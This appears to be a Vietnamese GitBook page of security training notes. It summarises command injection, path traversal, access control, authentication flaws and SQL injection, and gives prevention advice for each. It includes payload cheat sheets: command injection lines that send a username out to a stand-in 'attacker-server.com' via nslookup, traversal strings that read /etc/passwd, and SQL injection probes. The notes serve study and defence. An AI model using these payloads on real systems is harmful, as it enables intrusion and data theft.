Trainning
  • WEEK 2
    • Tìm hiểu các thành phần hệ điều hành
    • TryHackMe| Abusing Windows Internals
  • WEEK 3
    • Một số phương thức Persistence
    • Các Phương thức tấn công Process nâng cao
    • Implement tấn công
  • week 4
    • Linux
      • Basic Concept Linux
      • Symlink
      • Linux Persistence
      • Notes
    • PROCESS LIST
    • Network
      • OSI MODEL(OPEN SYSTEMS INTERCONNECTION MODEL)
      • Các giao thức phổ biến trong môi trường enterprise
        • SMB - Server Message Block
        • LDAP - Lightweight Directory Access Protocol
          • LDAP Injection
        • SSH - Secure Shell
        • RDP - Remote Desktop Protocol
        • ICMP - Internet Control Message Protocol
        • DNS - Domain Name System
        • DHCP - Dynamic Host Configuration Protocol
        • HTTP/HTTPS
  • WEEK 5
    • Các dạng tấn công trong network phổ biến (SYNC Flood, MAC flood,...)
    • Reconnaissance
    • Active Directory
      • Group Policy
    • NTLM vs Kerberos
      • Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
      • Path The Hash
      • ASREPRoast
        • Demo
      • Kerberoasting
        • Demo
      • Silver Ticket
        • Demo
      • Golden Ticket
        • Demo
      • Tóm tắt
    • Stealing Windows Credentials
      • Mimikatz
      • Custom SSP
    • LLMNR Poisoning, NTLM Replay
  • WEEK 6 + 7
    • DOM-based vulnerabilities
      • DOM-based open redirection
    • SQL Injection
      • Lab: Retrieving hidden data
      • Lab: Subvering application logic
      • SQL injection UNION attacks
        • Lab: SQL injection UNION attack, determining the number of columns returned by the query
        • Lab: SQL injection UNION attack, finding a column containing text
        • Lab: SQL injection UNION attack, retrieving data from other tables
        • Lab: SQL injection UNION attack, retrieving multiple values in a single column
      • Blind SQL Injection
        • Lab: Blind SQL injection with conditional responses
        • Lab: Blind SQL injection with conditional errors
        • Lab: Visible error-based SQL injection
        • Lab: Blind SQL injection with time delays
        • Lab: Blind SQL injection with time delays and information retrieval
        • Lab: Blind SQL injection with out-of-band interaction
        • Lab: Blind SQL injection with out-of-band data exfiltration
      • Examining the database
        • Lab: SQL injection attack, querying the database type and version on Oracle
        • Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft
        • Lab: SQL injection attack, listing the database contents on non-Oracle databases
        • Lab: SQL injection attack, listing the database contents on Oracle
      • Che dấu cuộc tấn công bằng Encode
        • Lab: SQL injection with filter bypass via XML encoding
    • Authentication
      • Lỗ hổng trong đăng nhập bằng mật khẩu
        • Lab: Username enumeration via different responses
        • Lab: Username enumeration via subtly different responses
        • Lab: Username enumeration via response timing
        • Lab: Broken brute-force protection, IP block
        • Lab: Username enumeration via account lock
        • Lab: Broken brute-force protection, multiple credentials per request
      • Lỗ hổng trong xác thực đa nhân tố
        • Lab: 2FA simple bypass
        • Lab: 2FA broken logic
        • Lab: 2FA bypass using a brute-force attack
      • Các lỗ hổng trong cơ chế xác thực khác
        • Lab: Brute-forcing a stay-logged-in cookie
        • Lab: Offline password cracking
        • Lab: Password reset broken logic
        • Lab: Password brute-force via password change
        • Lab: Password brute-force via password change
      • Lỗ hổng xác thực OAuth 2.0
        • Lab: Authentication bypass via OAuth implicit flow
        • Lab: Authentication bypass via OAuth implicit flow
        • Lab: Forced OAuth profile linking
        • Lab: OAuth account hijacking via redirect_uri
        • Lab: Stealing OAuth access tokens via an open redirect
        • Lab: Stealing OAuth access tokens via a proxy page
        • Lab: SSRF via OpenID dynamic client registration
    • Access Control
      • Lab: Unprotected admin functionality
      • Lab: Unprotected admin functionality with unpredictable URL
      • Lab: User role controlled by request parameter
      • Lab: User role can be modified in user profile
      • Lab: URL-based access control can be circumvented
      • Lab: Method-based access control can be circumvented
      • Lab: User ID controlled by request parameter
      • Lab: User ID controlled by request parameter, with unpredictable user IDs
      • Lab: User ID controlled by request parameter with data leakage in redirect
      • Lab: Insecure direct object references
      • Lab: Multi-step process with no access control on one step
      • Lab: Referer-based access control
    • Path Traversal
      • Lab: File path traversal, simple case
      • Lab: File path traversal, traversal sequences blocked with absolute path bypass
      • Lab: File path traversal, traversal sequences stripped non-recursively
      • Lab: File path traversal, traversal sequences stripped with superfluous URL-decode
      • Lab: File path traversal, validation of start of path
      • Lab: File path traversal, validation of file extension with null byte bypass
    • Command Injection
      • Lab: OS command injection, simple case
      • Lab: Blind OS command injection with time delays
      • Lab: Blind OS command injection with output redirection
      • Lab: Blind OS command injection with out-of-band interaction
      • Lab: Blind OS command injection with out-of-band data exfiltration
    • File uploads
    • Server-side request forgery (SSRF)
    • Cross-site scripting
      • Reflected XSS
      • Stored XSS
      • DOM-based XSS
      • Cross-site scripting contexts
    • Cross-site request forgery (CSRF)
      • Bypassing CSRF token validation
      • Bypass SameSite cookie restrictions
      • Page 2
    • Insecure deserializaton
    • Burp Suite
    • Tóm tắt
  • Week 8
    • Rà soát mã độc
Powered by GitBook
On this page
  • Command Injection
  • Path Traversal
  • Access Control
  • Authentication
  • SQL injection
  1. WEEK 6 + 7

Tóm tắt

Command Injection

  • Khái niệm: shell injection, cho phép thực thi OS command trên server chạy ứng dụng

  • Cheatsheet: Sử dụng các ký tự đặc biệt như 

&
&&
|
||
Time Delay Commands
& ping -c 10 127.0.0.1 &
Redirecting output
& whoami > /var/www/images/output.txt &
OOB (Out Of Band) Exploitation
& nslookup attacker-server.com &
& nslookup `whoami`.attacker-server.com &

  • Blind OS command injection: Có thể dùng time delay để phát hiện; chuyển hướng đầu ra để thực thi lệnh và lấy kết quả. Nếu các cách trên đều không thành công có thể sử dụng kỹ thuật OAST

  • Ngăn chặn: Tránh gọi trực tiệp OS command từ code ứng dụng. Nên triển khai sử dụng các API an toàn. Nếu buộc phải làm vậy thì nên xác thực đầu vào, không cố gắng làm sạch đầu vào vì dễ có sai sót

Path Traversal

  • Khái niệm: Cho phép đọc các tệp tùy ý trên app server qua duyệt thư mục

  • Payload phổ biến

../../../etc/passwd
/etc/passwd         Đường dẫn tuyệt đối
....//              Lồng nhau
%2e%2e%2f và %252e%252e%252f tương ứng. 
Ngoài ra, các mã hóa không chuẩn như ..%c0%af hoặc ..%ef%bc%8f
/var/www/images/../../../etc/passw   Bao gồm thư mục bắt đầu
../../../etc/passwd%00.png           Yêu cầu phần mở rộng

  • Ngăn chặn: Tránh hoàn toàn việc truyền dữ liệu đầu vào do người dùng cung cấp cho các API hệ thống tệp. Nếu không nên sử dụng 2 lớp bảo vệ để ngăn chặn các cuộc tấn công: Xác thực đầu vào trước khi xử lý, rồi sử dụng API hệ thông tệp xử lý tiếp.

Access Control

  • Khái niệm: Áp dụng các ràng buộc với các đối tượng để cho phép thực hiện hành động hoặc truy cập tài nguyên nào đó. (qua Xác thực, Quản lý phiên, Kiểm soát truy cập). Theo chiều dọc (Admin, Normal user), Chiều ngang (từng người dùng cụ thể), Ngữ cảnh (Khi thanh toán thì không thể sửa giỏ hàng)

  • Tăng đặc quyền theo chiều dọc: Duyệt đến trang admin không bảo vệ (/admin, qua tệp robots.txt hay mã nguồn), Dựa trên tham số (Ứng dụng đưa ra quyết định kiểm soát truy cập dựa trên giá trị được gửi : trường ẩn, cookie, tham số chuỗi truy vấn được đặt sẵn ....), Do nền tảng cấu hình sai dù DENY: POST, /admin/deleteUser, managers(Sử dụng header như X-Original-URLvà X-Rewrite-URL ghi đè URL, Sử dụng các HTTP method), do sự không khớp URL giúp bypass các biện pháp lọc đầu vào

  • Tăng đặc quyền theo chiều ngang: Lỗ hổng tham chiếu đối tượng trực tiếp không an toàn () -> Thay đổi request parameter, GUID thuộc về những người dùng khác có thể được tiết lộ ở nơi khác trong ứng dụng, Phản hồi chuyển hướng về trang đăng nhập chứa dữ liệu nhạy cảm.

  • Lỗ hổng kiểm soát truy cập trong quy tình nhiều bước: Bỏ qua các bước có kiểm soát nghiêm ngặt

  • Lỗ hổng kiểm soát truy cập dựa trên Referer (Nếu Referer header chứa/admin URL, request được cho phép.)

  • Lỗ hổng kiểm soát truy cập dựa trên vị trí: proxy web, VPN, ... để bypass

  • Ngăn chăn: Không bao giờ chỉ dựa vào các biện pháp che giấu để ngăn chặn, luôn từ chối truy cập tài nguyên ẩn thao mặc định, nên sử dụng một cơ chế duy nhất trên toàn ứng dụng để kiểm soát truy cập, ơ mã nguồn yêu cầu khai báo quyền truy cập được phép cho từng tài nguyên và từ chối quyền truy cập theo mặc định, kiểm tra và thử nghiệm kỹ lưỡng các biện pháp kiểm soát truy cập

Authentication

  • Khái niệm: Quá trình xác minh danh tính người dùng hoăc khách hàng dựa vào các nhân tố (biết - yếu tố kiến thức, có - yếu tố sở hữu, tạo ra - yếu tố vốn có)

  • Lỗ hổng trong đăng nhập bằng mật khẩu (brute-force mật khẩu, username, username enumeration qua status code, thông báo lỗi khác biệt hoặc reponse timing; Sử dụng tài khoản hợp lệ bypass chặn ip, Qua thông báo lỗi Account locking cấu hình sai ), Tấn công credential stuffing (susername mật khẩu bị lộ trong các vụ rò rỉ dữ liệu trước đó để đăng nhập), Lack user rate limit (Captcha, ...) bằng cách thay đổi IP hoặc sử dụng nhiều mật khẩu cho một request, Lỗ hổng trong HTTP basic authentication(token xác thực từ username và password mã hóa bằng Base 64, dễ bị brute-force, CSRF, hoặc MITM nếu không qua HTTPS)

  • Lỗ hổng trong xác thực đa nhân tố: Có thể bỏ qua trang xác thực 2 yếu tố, logic xác minh sai cho phép thay đổi accountcookie rồi brute force mã xác minh(năng cao với macro đề bypass cả việc ngăn chặn brute-force mã bằng đăng xuất)

  • Các lỗ hổng trong cơ chế xác thực khác: Giữ người dùng đăng nhập: Mã hóa stay-logged-in cookie không đúng cách (thuật toán mã hóa đơn giản, không thêm salt) có thể dẫn đến brute-force cookie dễ dàng; Đặt lại mật khẩu người dùng: Gửi mật khẩu qua kênh không an toàn như mail hoặc là trang đặt lại mật khẩu chứa tham số không an toàn; Thay đổi mật khẩu (có thể cho phép thay đổi trực tiếp mà không cần đăng nhập)

  • Ngăn chặn: Bảo vệ thông tin đăng nhập(HTTPS, tránh lộ lọt trên trình duyệt hay qua phản hồi), Thực thi chính sách mật khẩu nghiêm ngặt, triển khai bảo vệ chống brute-force, Kiểm tra kỹ lưỡng logic xác minh, bảo mật các chức năng bổ sung(đặt lại mật khẩu, ...), Triển khai xác thực đa yếu tố hiệu quả

SQL injection

  • Khái niêm: Lỗ hổng cho phép thiệp vào các truy vấn SQL mà ứng dụng thực hiện đối vói CSDL

  • Phát hiện: ' OR 1=1 OR 1=2kích hoạt độ trễ thời gian, kích hoạt tương tác mạng ngoài băng tần hoặc Phát hiện tự động sử dụng các công cụ như sqlmap, invicti, Burp Scanner...

  • Phân loại: Liệt kê nội dung CSDL, Điều chỉnh truy vấn SQL để trả về kết quả bổ sung, Điều chỉnh truy vấn SQL để trả về kết quả bổ sung, UNION attacks: Lấy dữ liệu từ các bảng CSDL khác, Blind SQL injection: Kết quả truy vấn bạn kiểm soát không được trả về trong phản hồi của ứng dụng, Second-order SQL injection( khi input được lưu lại sử dụng trong tương lai )

  • Ngăn chặn: Sử dụng Truy vấn có Tham số (Prepared Statements), tránh nối chuỗi trong truy vấn, Xác thực đầu vào và whitelist, không giả định một số đầu vào nào là an toàn

PreviousBurp SuiteNextRà soát mã độc

Last updated 8 months ago